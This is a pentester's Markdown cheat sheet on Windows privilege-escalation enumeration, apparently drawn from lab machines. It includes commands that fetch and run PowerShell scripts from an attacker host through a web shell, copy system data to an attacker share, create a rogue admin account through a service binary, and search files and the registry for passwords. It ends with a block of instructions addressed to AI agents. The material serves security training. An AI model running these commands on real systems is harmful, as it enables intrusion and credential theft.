# 2 Enums ## Enumeration: 1. Check your username and groups: 1. whoami 2. whoami /priv 3. netuser me 2. winPEAS fast, searchfast, cmd 1. [TransferFiles](/06-linux-privesc/04-transfer-files.md) 3. Seatbelt and other scripts 4. If scripts fail, run manually 5. Other Win PrivEsc Cheatsheets: 1. --Windows Enums ``` systeminfo ..OS build, Proc:x64, OS:x86 - Suggester hostname whoami /priv ..for Token Impersonation (Potato Exploits) net users net user Administrator cmdkey /list ..look for saved passwords ``` ## systeminfo * Find Kernel Exploits with systeminfo and WES * They can cause system-crash * Find matching exploits: google, exploitdb, github * ``` cd C:/Windows/Temp > systeminfo > sys.txt > copy sys.txt \\10.x.x.x\share\ . N/A hotfixes? Confirm here: dir C:\Windows\SoftwareDistribution\Download ..prep from wsus type C:\Windows\WindowsUpdate.log ..actual update logs ``` ## google ``` whoami hostname systeminfo .. OS, Version, Hotfixes google: "windows server 2008 6.1.7600 N/A Build 7600 privilege Escalation" google: "windows 7 enterprise 6.1.7600 priv esc vulnerabilities" found: github/abatchy17/WindowsExploits > MS11-046.exe, MS10-059.exe ..failed Github/Re4son/chimichurri.exe ..worked (arctic-htb) and MS11-046 (AFD PrivEsc) ..develHTB ``` ## Tasklist ``` tasklist /V ``` ## Windows Exploit Suggester * Lots of findings.. just have to look through them! * MS10-059 = [chimichurri](/07-win-privesc/win-kernelexp.md#chimichurri) ``` windows-exploit-suggester.py --database 2019-08-27-mssb.xls --systeminfo sys.txt ``` ## WES ``` curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py python3 wes.py --update python wes.py /share/systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more python wes.py ./sys.txt -s critical -i "Remote Code Execution" ``` ## WESng * Based on win-ver and patch level * ``` > curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py > python3 wes.py --update > python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only > python ./wes.py ~/htb/arctic/systeminfo.txt -i 'Elevation of Privilege' --exploits-only ``` ## Kernel Exploits * Compare to 'systeminfo' report * * ..for recent windows * USE: [WinKernelExploits](/07-win-privesc/win-kernelexp.md) ## Check Perms ``` accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" accesschk.exe /accepteula -quv user CleanUp.ps1 ``` ## User whoami privs Privs give yours special rights ``` whoami /priv ``` Note: if listed you have it!\ even if it says 'disabled' you still have it! * SeImpersonatePrivilege\ Allows impersonate Ex: [Juicy Potato](/07-win-privesc/win-privesc.md#juicy-potato)\\ * SeAssignPrimaryPrivilege\ Similar. Enables user to assign access token to new proc.\ Ex: [Juicy Potato](/07-win-privesc/win-privesc.md#juicy-potato) * SeBackupPrivilege\ Grants read access to ALL objects\ Could find sensitive files/hashes/registry\\ * SeRestorePrivilege\ Grants write to all objects overwrite binaries/dlls/registry\\ * SeTakeOwnerPrivilege\ Can take ownership and write overwrite binaries/dlls/registry\\ * Advanced:\ SeTcbPrivilege\ SeCreateTokenPrivilege\ SeLoadDriverPrivilege\ SeDebugPrivilege (used in getsystem) ## Windows Service Configuration Viewer * Check for misconfigs in services that can lead to privilege escalation. * You can replace the executable with your own * and have windows execute whatever code you want as the privileged user. ``` icacls scsiaccess.exe scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) Everyone:(I)(F) ``` ## Watson * Dot Net tool that Finds Missing Patches * * Check targets .NET version and Build that Version in VisualStudio ``` > reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" .NET v3.5 Build > Your version: OSx86 \\10.10.14.34\share\Watson.exe Watson Found 5 Vulns Including: MS11-046 ``` ## Sherlock * Example from [DrupalPhpVuln](/04-webapps/drupal.md#serialization-vulnerability-41564-php) ``` locate Sherlock.ps1 cp Sherlock.ps1 . dos2unix Sherlock.ps1 ..fixed some bad unicode (at beginning) vim Sherlock.ps1 Find-AllVulns ..add as last line http://10.x.x.x/ippsec.php?fexec= =echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/Sherlock.ps1')|powershell -noprofile - Found: MS15-051 ClientCopyImage not-vulnerable (but ippsec disagrees, try this) MS16-016 WebDAV ..requires 2 processors and race-condition ..lets ignore ``` ## UACME * Tries 30+ ways to PrivEsc * "You AC Me Bro" * ## UAC Bypass * User Account Control * Metasploit has 'bypassuac' for Windows7 * PowerShell Empire that prompts in a nice way ## BeRoot * Check for misconfigs in Win or Linux * C:\Tools\beRoot.exe * Found lots of vulns for PrivEsc ## PowerUp Scan * Powershell script to find PrivEsc Vulns and Exploit * PowerShell > PowerShellEmpire > PowerUp.ps1 * ``` locate PowerUp.ps1 (empire) cp PowerUp.ps1 . vim 'Invoke-AllChecks' ..Add as last line python -m SimpleHTTPServer Send to Victim (ex: Drupal) http://10.x.x.x/ippsec.php?fexec=systeminfo =echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile - Found a few 'writable directories' for oracle, but nothing great ex: c:\oracle\ora90\bin netstat -an ..3306 mysql, but not oracle (1521) ``` ## PowerUp Abuse * Abuse functions .. * Write-UserAddMSI * Write-ServiceBinary .. Will create user 'john' with password123 as admin! ``` locate PowerUp.ps1 cp PowerUp.ps1 . python -m SimpleHTTPServer ..Share Send the file to victim ..example from Drupal http://10.x.x.x/ippsec.php?fexec=systeminfo =echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile - PS> Import-Module .\PowerUp.ps1 ..run as Admin if you can PS> Invoke-AllChecks ..Scan ---------------------------------- Found: Unquoted Path: C:\Program Files\VideoStream\1337 Log\Checklog.exe Exploit: Will create a new user 'john' with Password 123! and Local Admin! (after a reboot/service restart) PS> Write-ServiceBinary -ServiceName 'Video Stream' -ServicePath ""C:\Program Files\VideoStream\1337.exe"" ``` ## SharpUp SharpUp - Good if you dont have PowerShell\ C# Compiled version: ``` win ps or cmd: > SharpUp.exe ``` ## Seatbelt Enumeration but doesnt hunt for privesc GhostPack/Seatbelt\ [https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/...Seatbelt.exe)\ ... Seatbelt.exe ``` Seatbelt.exe ...help Seatbelt.exe all Seatbelt.exe NonstandardServices ``` ## winPEAS Hunts for privesc, highlights\ Most powerful tool in this course!\ Most maintained tool carlospolop winPEAS\ Enable cmd Colors:\ reg add HKCU\Console /v VirtualTerminalLevel /t REG\_DWORD /d 1 If you cant get colors\ try running it from kali on reverse-shell ``` cd:\PrivEsc winPEASany.exe -h winPEASany.exe .. default: all winPEASany.exe userinfo winPEASany.exe quiet procesinfo .. (yes, misspelled) ``` ## accesschk Older but trustworthy tool to check ACL\ check access for user/group to file/dir/srv/reg\ downside: sometimes GUI popup agreement (older vers doesnt) ## Quick-Paste-Report * Copy/Paste into your remote Windows shell to generate a quick report: ``` @echo --------- BASIC WINDOWS RECON --------- > report.txt timeout 1 net config Workstation >> report.txt timeout 1 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt timeout 1 hostname >> report.txt timeout 1 net users >> report.txt timeout 1 ipconfig /all >> report.txt timeout 1 route print >> report.txt timeout 1 arp -A >> report.txt timeout 1 netstat -ano >> report.txt timeout 1 netsh firewall show state >> report.txt timeout 1 netsh firewall show config >> report.txt timeout 1 schtasks /query /fo LIST /v >> report.txt timeout 1 tasklist /SVC >> report.txt timeout 1 net start >> report.txt timeout 1 DRIVERQUERY >> report.txt timeout 1 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt timeout 1 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt timeout 1 dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt timeout 1 findstr /si password *.xml *.ini *.txt >> report.txt timeout 1 reg query HKLM /f password /t REG_SZ /s >> report.txt timeout 1 reg query HKCU /f password /t REG_SZ /s >> report.txt timeout 1 dir "C:\" timeout 1 dir "C:\Program Files\" >> report.txt timeout 1 dir "C:\Program Files (x86)\" timeout 1 dir "C:\Users\" timeout 1 dir "C:\Users\Public\" timeout 1 echo REPORT COMPLETE! ``` ## Problems ``` Enums failing? couldnt get watson or winPEAS.exe to work .NET might be OLD Example: 'Granny' had v1.0 .NET > dir C:\Windows\Microsoft.NET\Framework > reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP" Consider trying: Older version of Watson https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437 --------------------------------- --------------------------------- Use the .bat instead! C:\Temp>winPEAS.bat winPEAS.bat Nothing happened? Prefixing it with cmd /k worked. If you check cmd /?, the /k switch Carries out the command specified by string but remains. I suspect cmd /c would work as well but never tried that. C:\WINDOWS\Temp\Temp>cmd /k winPEAS.bat > output.txt cmd /k winPEAS.bat > output.txt Parsing Mof File: C:\WINDOWS\system32\wbem\Cli.mof(Phase Error - 3) Compiler returned error 0x80041001 etc... Ok results, but not great... ``` ## More... --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/07-win-privesc/win-enum.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.